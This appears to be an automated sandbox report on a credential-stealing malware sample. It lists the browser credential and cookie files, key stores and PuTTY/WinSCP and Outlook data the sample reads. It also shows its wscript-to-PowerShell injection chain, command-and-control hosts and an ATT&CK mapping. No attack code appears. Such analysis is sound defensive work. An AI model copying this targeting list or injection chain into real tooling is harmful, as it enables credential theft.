            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\uahuajd | Queries volume information: C:\Users\user\AppData\Roaming\uahuajd VolumeInformation
            Source: C:\Users\user\AppData\Roaming\uahuajd | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A02112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,14_2_00A02112
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A02198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,14_2_00A02198
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2908, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 3988, type: MEMORYSTR
            Source: Yara match | File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215d
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\targeting.snapshot.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txt
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\times.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txt
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55d
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbf
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txt
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\.metadata-v2
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959a
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aef
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\events
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\parent.lock
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.ini
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shm
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\xulstore.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5d
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.bin
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5c
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shm
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5fa
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
            Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fba
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-wal
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqlite
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-update
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19f
            Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.json
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Remote Access Functionality

            Source: Yara match, File source: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: explorer.exe PID: 2908, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: explorer.exe PID: 3988, type: MEMORYSTR
            Source: Yara match, File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information321
            Scripting
            Valid Accounts11
            Native API
            321
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Exploitation for Client Execution
            1
            DLL Side-Loading
            623
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            11
            Input Capture
            3
            File and Directory Discovery
            Remote Desktop Protocol1
            Data from Local System
            2
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter
            Logon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information
            1
            Credentials in Registry
            127
            System Information Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            DLL Side-Loading
            NTDS431
            Security Software Discovery
            Distributed Component Object Model11
            Input Capture
            114
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading
            LSA Secrets141
            Virtualization/Sandbox Evasion
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion
            Cached Domain Credentials13
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items623
            Process Injection
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Hidden Files and Directories
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1586466, Sample: sweetnessgoodforgreatnessth..., Startdate: 09/01/2025, Architecture: WINDOWS, Score: 100

            • Start (node 2)
              DNS/IP: prolinice.ga; res.cloudinary.com
              Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
              Started: wscript.exe (node 11, count 2); uahuajd (node 14, count 2)
            • wscript.exe (node 11)
              Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
              Started: powershell.exe (node 16, counts 14 and 16)
            • uahuajd (node 14)
              Started: conhost.exe (node 20)
            • powershell.exe (node 16)
              DNS/IP: 192.3.27.144, ports 49763 and 80, AS-COLOCROSSINGUS, United States
              Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
              Started: aspnet_compiler.exe (node 22); conhost.exe (node 25)
            • aspnet_compiler.exe (node 22)
              Signatures: Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); Maps a DLL or memory area into another process; Checks if the current machine is a virtual machine (disk enumeration); 2 other signatures
              Injected into: explorer.exe (node 27, counts 25 and 3)
            • explorer.exe (node 27)
              DNS/IP: prolinice.ga 46.173.214.14, ports 49913, 49942 and 49987, GARANT-PARK-INTERNETRU, Russian Federation
              Dropped: C:\Users\user\AppData\Roaming\uahuajd, PE32
              Signatures: Benign windows process drops PE files; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Hides that the sample has been downloaded from the Internet (zone.identifier)
              Started: explorer.exe (node 32, count 20); explorer.exe (node 35); explorer.exe (node 37); 6 other processes (node 39)
            • explorer.exe (node 32)
              Signatures: System process connects to network (likely due to code injection or exploit); Found evasive API chain (may stop execution after checking mutex); Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); 3 other signatures
            • explorer.exe (node 35)
              Signatures: Tries to harvest and steal browser information (history, passwords, etc)
            • 6 other processes (node 39)
              Started: WerFault.exe (node 41, count 21)

            Source | Detection | Scanner | Label | Link
